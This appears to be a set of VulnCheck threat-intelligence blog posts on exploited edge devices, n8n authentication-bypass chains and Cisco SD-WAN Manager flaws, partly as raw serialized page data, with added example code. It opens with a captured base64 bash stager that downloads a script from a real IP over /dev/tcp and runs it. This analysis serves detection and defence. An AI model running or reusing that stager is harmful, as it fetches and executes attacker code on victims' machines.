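    "IyEvYmluL2Jhc2gKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKX19jdXJsIGh0dHA6Ly83OC4xNTMuMTQwLjE2L3JlLnNofGJhc2g="
    "|base64 -d|bash')"
)
```

Running `inspect_metabase_request(METABASE_REQUEST)` and `inspect_js_payload(REACT2SHELL_PAYLOAD)` yields one finding each, both resolving to `78.153.140.16` in `matched_hosts`. The Metabase check keys on the `INIT=` alias rather than on the `curl`/`wget` text, so it still fires when the command inside `CALL` changes; the JS check decodes the stager rather than matching the base64 blob, so a re-encoded stager with the same `/dev/tcp` trick is still caught.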
## Network Edge Device Report (post slug: network-edge-device-report-2026)

Patrick Garrity, 2026-03-23

Press coverage:

- Cybersecurity Dive, 2026-03-23: [Network edge devices still widely used after reaching end-of-life status](https://www.cybersecuritydive.com/news/network-edge-devices-still-widely-used-after-reaching-end-of-life-status/815403/)
- Yahoo, 2026-03-23: [Network edge devices still widely used after reaching end-of-life status](https://www.yahoo.com/news/articles/network-edge-devices-still-widely-095558259.html?guccounter=1)
- Cybersecurity Dive: [FCC bans import of consumer-grade routers amid national security concerns](https://www.cybersecuritydive.com/news/fcc-bans-import-consumer-grade-routers-national-security/815528/)
- news.risky.biz, 2026-03-25: [Risky Bulletin Newsletter](https://news.risky.biz/risky-bulletin-the-intellexa-ceo-is-pissed/)

![Network Edge Device Report](/blog/network-edge-device-report-2026/network-edge-device-kevs-2025-eol.png)

When I started researching network edge devices with evidence of exploitation in VulnCheck KEV, I wanted to better understand what was actually being targeted. Specifically, I was interested in the types of devices being exploited, whether they were still supported, and how attackers are using them.

That led me to dig deeper into questions like consumer versus enterprise devices, where vendors are headquartered, and which device types are targeted by botnets versus ransomware. What started as a quick blog post quickly grew into something much larger. The research expanded beyond what typically fits in a blog, so we decided to turn it into a full report as part of our 2026 State of Exploitation research.

[Download the full report](https://wwv.vulncheck.com/2026-network-edge-device-report)

The timing of this report also aligns with CISA's recently released Binding Operational Directive, [BOD 26-02: Mitigating Risk From End of Support Edge Devices](https://www.cisa.gov/news-events/directives/bod-26-02-mitigating-risk-end-support-edge-devices). That raised an important question for me. Can broader exploitation evidence for end-of-life devices help defenders gain better visibility into the risks in their own environments?

![Network Edge Device Report](/blog/network-edge-device-report-2026/network-edge-device-kevs-2025.png)

### Key Findings From the Report

- 42.5 percent of vulnerabilities exploited in 2025 affected devices that are end of life or likely end of life, with additional vulnerabilities impacting products that have already reached end of sale.
- Consumer networking equipment is a major exploitation target. Consumer routers and globally distributed networking products account for 56 percent of exploited edge device vulnerabilities.
- Botnets disproportionately target unsupported devices. 65 percent of vulnerabilities exploited by botnets affect end of life or likely end of life products.
- Many exploited edge device vulnerabilities are not represented in CISA KEV. Only 23.7 percent of the vulnerabilities identified by VulnCheck appear in CISA KEV.
- Active exploitation frequently precedes CVE assignment. VulnCheck issued CVEs for 18 vulnerabilities after detecting exploitation activity through honeypots and canary systems.

I hope you enjoy this exploration into network edge device exploitation.

Cheers,  
Patrick Garrity

### Read the Full Report

This research is part of our broader State of Exploitation 2026 series, where we analyze real-world exploitation trends using VulnCheck KEV and additional VulnCheck threat intelligence.

[Download the full report](https://wwv.vulncheck.com/2026-network-edge-device-report)

Summary: What's really being targeted at the network edge? VulnCheck's 2026 research shows that a significant portion of exploited vulnerabilities affect end-of-life devices, with consumer networking equipment and botnets driving much of the activity. This report breaks down the trends shaping real-world exploitation.

## n8n Should Have More Than One CISA KEV Entry

Jacob Baines ([@Junior_Baines](https://twitter.com/Junior_Baines)), 2026-03-20

Press coverage:

- news.risky.biz, 2026-03-23: [Risky Bulletin Newsletter](https://news.risky.biz/risky-bulletin-github-is-starting-to-have-a-real-malware-problem/)
- Resilient Cyber, 2026-03-27: [Newsletter #90](https://www.resilientcyber.io/p/resilient-cyber-newsletter-90)

### Key Takeaways

- CVE-2025-68613 was added to CISA KEV as an authenticated RCE, but it can be paired with CVE-2026-21858 to bypass authentication.
- CVE-2026-21858 is not included in CISA KEV, despite strong evidence it is being exploited in the wild and enables unauthenticated RCE.
- Over 14,000 n8n instances remain vulnerable, suggesting the real-world risk is not reflected in CISA KEV.

### Technical Reality

On March 11, 2026, CISA added [CVE-2025-68613](https://console.vulncheck.com/cve/CVE-2025-68613)
to its Known Exploited Vulnerability Catalog. The vulnerability affects n8n (pronounced en-eight-en), a workflow automation platform, and requires authentication. That requirement alone is enough for many to dismiss the issue. Doing so would be a mistake because the KEV entry lacks important context.

There is an authentication bypass. CVE-2025-68613 can be paired with CVE-2026-21858 to achieve unauthenticated remote code execution, as demonstrated in a public [proof of concept](https://github.com/Chocapikk/CVE-2026-21858) developed by our prolific friend [Chocapikk](https://github.com/Chocapikk). These vulnerabilities can be combined across versions from 1.65.0 (October 2024) through 1.121.0 (November 2025), significantly expanding the pool of exploitable targets.

If CVE-2025-68613, a vulnerability that nominally requires authentication, is being exploited in the wild, it is reasonable to assume it is being paired with CVE-2026-21858, which removes that barrier entirely. This is not just missing context in CISA KEV; it points to a second vulnerability that likely deserves its own KEV entry.

### Observed Exploitation

We don't have to assume this chaining is happening. There is clear evidence that CVE-2026-21858 is being exploited in the wild. VulnCheck Canary Intelligence has observed exploitation against n8n canaries, with particularly high volume from 185.177.72.30. [Shadowserver](https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-16&host_type=src&vulnerability=cve-2026-21858) and [GreyNoise](https://viz.greynoise.io/tags/n8n-arbitrary-file-access-cve-2026-21858-attempt) report consistent daily exploitation attempts, and honeypot observations, including from [Beelzebub](https://beelzebub.ai/blog/catching-ni8mare-in-the-wild-cve-2026-21858/), further confirm in-the-wild activity. Public [proof-of-concepts](https://github.com/sec-dojo-com/CVE-2026-21858) and [blog](https://www.cyera.com/research/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858) posts demonstrate how the vulnerability can be used in practice.

This activity led to CVE-2026-21858 being added to the [VulnCheck KEV](https://api.vulncheck.com/v3/index/vulncheck-kev?cve=CVE-2026-21858) on January 9, 2026. In other words, the capability needed to turn CVE-2025-68613 into unauthenticated RCE was already being actively exploited when the CISA KEV entry was created.

### Adversary Behavior

The CISA KEV entry also fails to provide context on who is conducting the exploitation. [Reporting](https://ctrlaltintel.com/threat%20research/MuddyWater/) has linked exploitation of CVE-2025-68613 to [MuddyWater](https://malpedia.caad.fkie.fraunhofer.de/actor/muddywater) (also known as [Static Kitten](https://www.crowdstrike.com/en-us/adversaries/static-kitten/), [G0069](https://attack.mitre.org/groups/G0069/), and [Mango Sandstorm](https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/)), an Iranian state-sponsored group known for exploiting a wide range of vulnerabilities across internet-facing systems.

Notably, the activity described involves scanning for and exploiting multiple CVEs at scale. In that context, it is unclear how a requirement for valid authentication would be reliably satisfied. This further supports the case that CVE-2025-68613 is unlikely to be exploited as a strictly authenticated vulnerability and that related issues enabling unauthenticated access warrant separate consideration in KEV.

### But Wait! There's More

It's also worth noting that if attackers are using valid credentials to exploit CVE-2025-68613, they would benefit from the fact that the initial patch was bypassed and later addressed as CVE-2026-25049. As shown by [Fatih Celik](https://fatihhcelik.github.io/posts/n8n-RCEs-A-Tale-of-4-Acts/), the original issue can be bypassed in multiple ways, which attackers would likely continue to leverage where possible.

Additionally, CVE-2026-21858 is not limited to pairing with CVE-2025-68613. Other post-authentication vulnerabilities, including CVE-2026-1470, CVE-2026-0863, and CVE-2026-21877, provide additional paths to exploitation once access is obtained.

The common denominator across these scenarios is the ability to bypass authentication entirely. That capability, not any single post-authentication issue, is what should be represented in CISA KEV.

### Exposure Remains Relatively High

Defenders often deprioritize authenticated issues, and the exposure numbers show why that is risky here: our Target Intelligence has scanned the internet and identified over 14,000 exposed endpoints still vulnerable to CVE-2025-68613. With the availability of authentication bypasses and evidence that APT groups like MuddyWater are actively exploiting these systems, patching should be treated as urgent, not optional.

Exposure spans 96 countries, with the majority concentrated in the United States.

Top n8n installs by country (March 17, 2026):

| Country | Exposed instances |
| --- | --- |
| US | 8834 |
| DE | 1743 |
| SG | 1268 |
| FR | 1130 |
| VN | 1045 |
| IN | 1045 |
| BR | 873 |
| NL | 762 |
| AU | 697 |
| GB | 612 |

Exposed versions are similarly widespread, though many deployments remain on versions released around 1.110.

Top n8n versions in the wild (March 17, 2026):

| Version | Exposed instances |
| --- | --- |
| 1.113.3 | 1051 |
| 1.115.3 | 991 |
| 1.110.1 | 967 |
| 1.106.3 | 890 |
| 1.116.2 | 889 |
| 1.107.4 | 745 |
| 1.114.4 | 698 |
| 1.108.2 | 659 |
| 1.111.0 | 617 |
| 1.109.2 | 617 |

In other words, this is not a niche issue. It is a widely exposed and actively exploited attack surface. That reality is not reflected in CISA KEV, but it is captured in VulnCheck KEV. At a minimum, the authentication bypass enabling these attack paths warrants its own KEV entry.

Summary: CISA recently added CVE-2025-68613, an authenticated n8n RCE, to its KEV catalog, but that framing misses how the vulnerability is actually exploited. In practice, it can be paired with CVE-2026-21858, an authentication bypass that is already being actively exploited in the wild. With over 14,000 exposed n8n instances, this attack path is both practical and widespread. The bypass enabling these chains likely warrants its own KEV entry.
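A triage helper for the exposure question the post raises, as an added example (not code from the VulnCheck post): it classifies n8n instances by the version window the post gives for the CVE-2026-21858 + CVE-2025-68613 chain (1.65.0 through 1.121.0, inclusive), rolls an inventory up per country, and applies the same check to the post's top-ten version histogram. The window bounds and the top-ten counts are taken from the post; the scan records and hostnames are constructed for the example. "Outside the window" means only that the version is not in the range the post describes, not that the instance is safe.

```python
"""Classify n8n instances against the chain window the post describes and roll up exposure.

Added example, not code from the VulnCheck post. Window bounds and TOP_VERSIONS come from
the post; SAMPLE_SCAN is constructed. Outside-the-window is not a statement of safety.
"""
from __future__ import annotations

import re
from collections import Counter

CHAIN_WINDOW = ((1, 65, 0), (1, 121, 0))  # from the post: 1.65.0 (Oct 2024) .. 1.121.0 (Nov 2025)
VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")  # tolerates a leading "v" and -rc/-beta suffixes


def parse_version(text: str) -> tuple[int, int, int] | None:
    """Return (major, minor, patch) or None when the banner does not look like a version."""
    match = VERSION_RE.match(text.strip())
    return tuple(int(part) for part in match.groups()) if match else None


def in_chain_window(text: str) -> bool | None:
    """True inside the window, False outside, None if the version could not be parsed."""
    parsed = parse_version(text)
    if parsed is None:
        return None
    low, high = CHAIN_WINDOW
    return low <= parsed <= high


def triage(records: list[dict]) -> dict:
    """Roll scan records up into exposed-per-country, outside-window count and unparsed hosts."""
    exposed: Counter[str] = Counter()
    outside = 0
    unparsed: list[str] = []
    for record in records:
        verdict = in_chain_window(record["version"])
        if verdict is None:
            unparsed.append(record["host"])  # needs a manual look, do not silently drop it
        elif verdict:
            exposed[record["country"]] += 1
        else:
            outside += 1
    return {"exposed_by_country": dict(exposed), "outside_window": outside, "unparsed": unparsed}


def count_in_window(version_counts: dict[str, int]) -> tuple[int, int]:
    """(instances on versions inside the window, total instances) for a version histogram."""
    inside = sum(n for version, n in version_counts.items() if in_chain_window(version))
    return inside, sum(version_counts.values())


# Top ten exposed versions from the post (March 17, 2026).
TOP_VERSIONS = {"1.113.3": 1051, "1.115.3": 991, "1.110.1": 967, "1.106.3": 890, "1.116.2": 889,
                "1.107.4": 745, "1.114.4": 698, "1.108.2": 659, "1.111.0": 617, "1.109.2": 617}

# Constructed scan records for the example (hostnames are placeholders).
SAMPLE_SCAN = [
    {"host": "n8n-a.example", "country": "US", "version": "1.113.3"},
    {"host": "n8n-b.example", "country": "US", "version": "1.121.0"},
    {"host": "n8n-c.example", "country": "DE", "version": "1.123.1"},
    {"host": "n8n-d.example", "country": "SG", "version": "1.64.9"},
    {"host": "n8n-e.example", "country": "DE", "version": "unknown"},
    {"host": "n8n-f.example", "country": "FR", "version": "v1.110.1-rc.1"},
]
```

`count_in_window(TOP_VERSIONS)` returns `(8124, 8124)`: every one of the ten most common exposed versions in the post's chart sits inside the chain window, which is the quantitative form of the post's point that the exposure is not niche. The inclusive upper bound matters for the `1.121.0` record in `SAMPLE_SCAN`; a strict comparison would miss it.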
## Cisco Catalyst SD-WAN Manager vulnerabilities (post slug: cisco-sd-wan-manager-vulns)

Josh Shomo ([LinkedIn](https://www.linkedin.com/in/josh-shomo-5260bb259/)) and a second author (LinkedIn in/ccondon)

Press coverage:

- Dark Reading, 2026-03-13: [Fake PoCs, Misunderstood Risks Cause Cisco SD-WAN Chaos](https://www.darkreading.com/vulnerabilities-threats/fake-pocs-risks-cisco-sd-wan)
- news.risky.biz, 2026-03-13: [Risky Bulletin: Meta disrupts Mexican cartels](https://news.risky.biz/risky-bulletin-meta-disrupts-mexican-cartels/)
- news.risky.biz, 2026-03-16: [Risky Bulletin Newsletter](https://news.risky.biz/risky-bulletin-meta-disrupts-mexican-cartels/)
- CyberScoop, 2026-03-18: [Cisco's latest vulnerability spree has a more troubling pattern underneath](https://cyberscoop.com/cisco-firewall-sd-wan-vulnerabilities-exploited/)
- SC Media, 2026-03-18: [VulnCheck: Threat of high-severity Cisco SD-WAN bug potentially missed](https://www.scworld.com/brief/vulncheck-threat-of-high-severity-cisco-sd-wan-bug-potentially-missed)
- Cybersecurity Dive, 2026-04-21: [CISA confirms exploitation of 3 more Cisco networking device vulnerabilities](https://www.cybersecuritydive.com/news/cisa-cisco-vulnerabilities-sd-wan-confirm-exploitation/818064/)

### Key Takeaways

- Over the past two weeks, Cisco has disclosed half a dozen new vulnerabilities in Catalyst SD-WAN Manager, half of which are now known to be exploited in the wild.
- Community interest has centered on CVE-2026-20127, a zero-day authentication bypass exploited by UAT-8616; initial public proof-of-concept code for CVE-2026-20127 was misattributed and will lead to incomplete detections.
- The VulnCheck research team assesses that CVE-2026-20133 is a higher risk than defenders may realize, and is likely to be exploited, if exploitation isn't already ongoing under the radar.

In response to customer requests, the VulnCheck Initial Access Intelligence team has been analyzing a slew of different Cisco vulnerabilities over the past week and change. As is typical for emerging threat vulnerabilities, our team has seen a variety of incorrectly attributed or fake public PoCs for several of these flaws; this blog details research team observations across more than half a dozen different CVEs in Cisco Catalyst SD-WAN Manager.

Our team's ASM queries for Cisco Catalyst SD-WAN show a range of results, depending on the engine: ZoomEye finds roughly 275 internet-exposed instances, Shodan and Censys discover between 450 and 550, and FOFA shows upwards of a thousand.

### Background

On February 25, 2026, Cisco's Talos team [published a blog](https://blog.talosintelligence.com/uat-8616-sd-wan/) disclosing in-the-wild exploitation of two vulnerabilities in Catalyst SD-WAN Manager: CVE-2026-20127, a CVSS-10 zero-day flaw in Catalyst SD-WAN Controller's peering authentication that allowed unauthenticated adversaries to bypass authentication and gain initial (administrative) access; and [CVE-2022-20775](https://console.vulncheck.com/cve/CVE-2022-20775), an older, previously unexploited vulnerability in the SD-WAN CLI that delivered post-auth privilege escalation and remote command execution as root.
Threat activity targeting the two vulnerabilities was traced back to 2023 and attributed to UAT-8616, which the Talos team deemed “a highly sophisticated cyber threat actor.” In addition to Cisco’s ",[47,11293,11046],{"href":11294,"rel":11295},"https:\u002F\u002Fblog.talosintelligence.com\u002Fuat-8616-sd-wan\u002F",[51],", which contains investigative guidance, the Australian Signals Directorate released a ",[47,11298,11301],{"href":11299,"rel":11300},"https:\u002F\u002Fwww.cyber.gov.au\u002Fsites\u002Fdefault\u002Ffiles\u002F2026-02\u002FACSC-led%20Cisco%20SD-WAN%20Hunt%20Guide.pdf",[51],"41-page tradecraft and threat hunting report"," on the zero-day exploit in conjunction with Five Eyes intelligence partners.",[18,11304,11305,11306,11309],{},"While the majority of the community’s interest has (understandably) focused on CVE-2026-20127, the zero-day initial access vulnerability, Cisco also published an aggregate ",[47,11307,5359],{"href":1001,"rel":11308},[51]," for five other flaws in Catalyst SD-WAN Manager:",[22,11311,11312,11318,11326,11336,11348],{},[25,11313,11314,11317],{},[47,11315,803],{"href":801,"rel":11316},[51],", an authenticated file overwrite issue in the SD-WAN Manager API that the VulnCheck team exploited to upload a webshell to a vulnerable target system;",[25,11319,11320,11325],{},[47,11321,11324],{"href":11322,"rel":11323},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20126",[51],"CVE-2026-20126",", a post-authentication privilege escalation to root via the REST API;",[25,11327,11328,11331,11332,11335],{},[47,11329,761],{"href":759,"rel":11330},[51],", an authenticated file read vulnerability that allows for Data Collection Agent (DCA) user takeover, provided the attacker has valid ",[886,11333,11334],{},"vmanage"," credentials;",[25,11337,11338,11343,11344,11347],{},[47,11339,11342],{"href":11340,"rel":11341},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20129",[51],"CVE-2026-20129",", an authentication 
bypass that gives remote, unauthenticated adversaries access to the ",[886,11345,11346],{},"netadmin"," user; and",[25,11349,11350,11353],{},[47,11351,783],{"href":781,"rel":11352},[51],", an unauthenticated information disclosure issue in the SD-WAN Manager API",[307,11355,11356,11372],{},[310,11357,11358],{},[313,11359,11360,11362,11364,11366,11369],{},[316,11361,319],{},[316,11363,10625],{},[316,11365,3679],{},[316,11367,11368],{},"Exploited?",[316,11370,11371],{},"EPSS",[336,11373,11374,11390,11405,11420,11433,11447,11462],{},[313,11375,11376,11378,11381,11384,11387],{},[341,11377,526],{},[341,11379,11380],{},"Cisco Catalyst SD-WAN Controller Authentication Bypass",[341,11382,11383],{},"10 (Critical)",[341,11385,11386],{},"Yes, zero-day",[341,11388,11389],{},"0.02604",[313,11391,11392,11394,11397,11400,11402],{},[341,11393,11290],{},[341,11395,11396],{},"Cisco SD-WAN CLI Privilege Escalation",[341,11398,11399],{},"7.8 (High)",[341,11401,383],{},[341,11403,11404],{},"0.00499",[313,11406,11407,11409,11412,11415,11417],{},[341,11408,803],{},[341,11410,11411],{},"Cisco Catalyst SD-WAN Manager API File Overwrite",[341,11413,11414],{},"5.4 (Medium)",[341,11416,383],{},[341,11418,11419],{},"0.00042",[313,11421,11422,11424,11427,11429,11431],{},[341,11423,11324],{},[341,11425,11426],{},"Cisco Catalyst SD-WAN Manager Privilege",[341,11428,11399],{},[341,11430,359],{},[341,11432,11419],{},[313,11434,11435,11437,11439,11442,11444],{},[341,11436,761],{},[341,11438,764],{},[341,11440,11441],{},"7.5 (High)",[341,11443,383],{},[341,11445,11446],{},"0.00019",[313,11448,11449,11451,11454,11457,11459],{},[341,11450,11342],{},[341,11452,11453],{},"Cisco Catalyst SD-WAN Manager API Improper Authentication",[341,11455,11456],{},"9.8 (Critical)",[341,11458,359],{},[341,11460,11461],{},"0.00148",[313,11463,11464,11466,11469,11471,11473],{},[341,11465,783],{},[341,11467,11468],{},"Cisco Catalyst SD-WAN Manager API Information 
Disclosure",[341,11470,11441],{},[341,11472,359],{},[341,11474,11475],{},"0.00047",[18,11477,11478,11479,11482,11483,982,11485,11487],{},"None of the additional CVEs above was listed as exploited in the wild at time of disclosure, but on March 5, Cisco updated their ",[47,11480,5359],{"href":1001,"rel":11481},[51]," to reflect that both ",[295,11484,761],{},[295,11486,803],{}," were seeing active exploitation. Both issues were immediately added to VulnCheck’s KEV; as of March 11, neither is on CISA KEV.",[18,11489,11490,11491,11496,11497,11502,11503,11506],{},"Since public disclosure of CVE-2026-20127, several ",[47,11492,11495],{"href":11493,"rel":11494},"https:\u002F\u002Fx.com\u002Fethicalhack3r\u002Fstatus\u002F2029244376908435492",[51],"firms"," have ",[47,11498,11501],{"href":11499,"rel":11500},"https:\u002F\u002Fx.com\u002FSimoKohonen\u002Fstatus\u002F2029483790909702425",[51],"observed"," in-the-wild exploitation using a public proof of concept released March 3 — except, as it turns out, that public PoC doesn’t actually exploit CVE-2026-20127 at all, but rather several other completely different vulnerabilities. CVE-2026-20127 exploitation detections based on the March 3 ",[886,11504,11505],{},"zerozenxlabs"," PoC, in other words, are incorrectly attributed.",[61,11508,11510],{"id":11509},"vulncheck-research-observations","VulnCheck Research Observations",[18,11512,11513,11514,11519,11520,10515,11522,11527],{},"As is typical with emerging threat vulnerabilities, several public proof-of-concept exploits that claimed to target CVE-2026-20127 hit code-sharing platforms not long after the vulnerability was published. Since VulnCheck’s research team validates and curates ",[47,11515,11518],{"href":11516,"rel":11517},"https:\u002F\u002Fwww.vulncheck.com\u002Fxdb",[51],"public exploits",", we reviewed and discarded several fake or otherwise non-functional exploits. 
On March 3, GitHub user ",[886,11521,11505],{},[47,11523,11526],{"href":11524,"rel":11525},"https:\u002F\u002Fgithub.com\u002Fzerozenxlabs\u002FCVE-2026-20127---Cisco-SD-WAN-Preauth-RCE",[51],"posted PoC code"," that purportedly exploited CVE-2026-20127.",[18,11529,11530,11531,11533,11534,11537,11538,11540,11541,11546,11547,11549],{},"Our team tested the exploit against a live SD-WAN target, and determined that while it ",[1131,11532,5650],{}," a valid exploit, it ",[295,11535,11536],{},"does not"," exploit CVE-2026-20127 at all, but rather three of the other vulnerabilities Cisco disclosed in SD-WAN Manager: CVE-2026-20133 and CVE-2026-20128 are used to leak and read the DCA credential file, after which the exploit leverages CVE-2026-20122 in the API to upload a webshell. CVE-2026-20127, by contrast, affects peering authentication between vManagers and vControllers, which is a completely different area of the code base that the ",[886,11539,11505],{}," PoC never touches. Rapid7’s Stephen Fewer ",[47,11542,11545],{"href":11543,"rel":11544},"https:\u002F\u002Fgithub.com\u002Fsfewer-r7\u002FCVE-2026-20127",[51],"published an exploit"," that ",[1131,11548,4563],{}," actually target CVE-2026-20127 on March 11, which means in-the-wild exploit attempts against the real vulnerability are likely to pick up.",[18,11551,11552,11553,11556,11557,11562,11563,11566,11567,11572,11573,11577],{},"Cisco still has not indicated any known exploitation of CVE-2026-20133, which is somewhat surprising, considering that the file system access the vulnerability provides allowed our research team to extract the ",[886,11554,11555],{},"vmanage-admin"," user’s private key and compromise the Network Configuration Protocol (NETCONF) used to 
",[47,11558,11561],{"href":11559,"rel":11560},"https:\u002F\u002Fwww.cisco.com\u002Fc\u002Fen\u002Fus\u002Ftd\u002Fdocs\u002Fsolutions\u002FCVD\u002FSDWAN\u002Fcisco-sdwan-design-guide.html#:~:text=The%20NETCONF%20protocol%20defines%20a,NETCONF%20for%20communication%20with%20SD",[51],"configure and manage"," SD-WAN devices. The VulnCheck team also used CVE-2026-20133 to leak ",[886,11564,11565],{},"confd_ipc_secret",", allowing any local user to escalate to an unconstrained root shell. Notably, this is the same technique documented by ",[47,11568,11571],{"href":11569,"rel":11570},"https:\u002F\u002Fwww.orange.com\u002F",[51],"Orange group","’s Cyrille CHATRAS, who discovered and reported SD-WAN Manager ",[47,11574,11290],{"href":11575,"rel":11576},"https:\u002F\u002Fgithub.com\u002Forangecertcc\u002Fsecurity-research\u002Fsecurity\u002Fadvisories\u002FGHSA-wmjv-552v-pxjc",[51]," back in 2021.",[18,11579,11580,11581,11583],{},"Defenders who are using the ",[886,11582,11505],{}," PoC to inform signatures have a good start on detecting any potential CVE-2026-20133 exploitation, but should note that CVE-2026-20133 can leak any file on the filesystem and is not limited to leaking the DCA user secret specifically.",[61,11585,1903],{"id":1902},[18,11587,11588],{},"Early exploits and industry attention on emerging threats can be useful for understanding likely exploitation paths and vulnerability nuances, but they can also lead organizations astray when they rely on untested research artifacts or overly narrow focus on specific attack paths. VulnCheck’s Initial Access Intelligence team applies an exploit-first lens to broad swaths of vulnerabilities, validating and improving upon public research artifacts while developing original capabilities and insights.",[61,11590,202],{"id":201},[18,11592,11593,11594,1246,11597,1255,11602,59],{},"VulnCheck’s Initial Access Intelligence team is always on the hunt for new exploits and fresh shells. 
By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how attackers can actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus. For more research like this, see ",[47,11595,10339],{"href":10337,"rel":11596},[51],[47,11598,11601],{"href":11599,"rel":11600},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fmetro4shell_eitw",[51],"Metro4Shell: Exploitation of React Native’s Metro Server in the Wild",[47,11603,10344],{"href":10342,"rel":11604},[51],[18,11606,1228,11607,1234,11610,1240,11613,1246,11616,1255,11619,1260],{},[47,11608,1233],{"href":1231,"rel":11609},[51],[47,11611,1239],{"href":1237,"rel":11612},[51],[47,11614,1245],{"href":1243,"rel":11615},[51],[47,11617,1251],{"href":1249,"rel":11618},[51],[47,11620,216],{"href":1258,"rel":11621},[51],{"title":219,"searchDepth":220,"depth":220,"links":11623},[11624,11625,11626,11627,11628],{"id":3520,"depth":220,"text":20},{"id":11272,"depth":220,"text":11273},{"id":11509,"depth":220,"text":11510},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2026-03-12","VulnCheck’s Initial Access Intelligence team has been tracking and analyzing half a dozen recent vulnerabilities in Cisco Catalyst SD-WAN Manager, several of which have begun to see in-the-wild exploitation. 
Industry focus has been on CVE-2026-20127, but several other vulnerabilities also pose significant risk.",{"slug":11632},"cisco-sd-wan-manager-vulns","\u002Fblog\u002Fcisco-sd-wan-manager-vulns",{"title":10334,"description":11630},"blog\u002Fcisco-sd-wan-manager-vulns",[242,1281,1279],"12rkiHSJdCWgCDEN9Zj5t6kmQm0MJG5T6vGxeEv3HEY",{"id":11639,"title":11640,"articles":7,"authors":11641,"body":11643,"date":12112,"description":12113,"extension":234,"image":7,"link":7,"meta":12114,"navigation":237,"path":12116,"seo":12117,"series":7,"stem":12118,"subtype":7,"tags":12119,"__hash__":12120},"blog\u002Fblog\u002Fsiftrank_canaries.md","SiftRanking Canary Intelligence",[11642],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":11644,"toc":12101},[11645,11649,11656,11673,11677,11680,11683,11686,11689,11693,11696,11699,11705,11711,11714,11717,11794,11797,11876,11879,11883,11886,11889,11892,11909,11912,11915,11929,11932,11935,11948,11951,11955,11958,11961,11964,11970,11973,11979,11982,11986,11989,12007,12014,12020,12023,12030,12033,12042,12044,12047,12050,12052,12078,12098],[61,11646,11648],{"id":11647},"introduction","Introduction",[18,11650,11651,11652,11655],{},"On a typical day, VulnCheck ",[47,11653,283],{"href":281,"rel":11654},[51]," captures thousands of active exploitation attempts targeting production systems. Within that volume are routine patterns, evolving tradecraft, and occasionally something that demands immediate scrutiny. The problem is knowing which is which.",[18,11657,11658,11659,11664,11665,11672],{},"Customers regularly ask how VulnCheck intelligence can be integrated into AI-driven workflows. Prioritization is a natural starting point. 
Caleb Gross’ ",[47,11660,11663],{"href":11661,"rel":11662},"https:\u002F\u002Fgithub.com\u002Fnoperator\u002Fsiftrank",[51],"SiftRank",", introduced in \"",[1131,11666,11667],{},[47,11668,11671],{"href":11669,"rel":11670},"https:\u002F\u002Farxiv.org\u002Fpdf\u002F2512.06155",[51],"Sift or Get Off the PoC: Applying Information Retrieval to Vulnerability Research with SiftRank","\", provides a practical way to rank exploitation activity and surface the entries that warrant deeper investigation.",[61,11674,11676],{"id":11675},"ranking-requires-preprocessing","Ranking Requires Preprocessing",[18,11678,11679],{},"Two constraints become immediately apparent.",[18,11681,11682],{},"First, SiftRank operates on natural language. Canary Intelligence does not. It consists of JSON records, raw HTTP requests, serialized payloads, and exploit artifacts. Feeding that directly into SiftRank produces unreliable output.",[18,11684,11685],{},"Second, scale introduces inefficiency. A 10-day Canary export contains tens of thousands of exploitation attempts. Attackers routinely reuse scanners and exploit templates, which results in substantial payload similarity across entries. Ranking each variation independently increases processing cost without adding new insight.",[18,11687,11688],{},"Before SiftRank could be useful, the data had to be transformed.",[993,11690,11692],{"id":11691},"clustering-similar-payloads-with-tlsh","Clustering Similar Payloads with TLSH",[18,11694,11695],{},"The first preprocessing step is to cluster similar payloads using TLSH, a locality sensitive hashing algorithm designed for fuzzy similarity comparisons. TLSH does not attempt semantic understanding. Instead, it groups payloads based on structural similarity, which is sufficient to collapse minor variations of the same exploit pattern.",[18,11697,11698],{},"The following two payloads were observed within the same 10-day Canary export. 
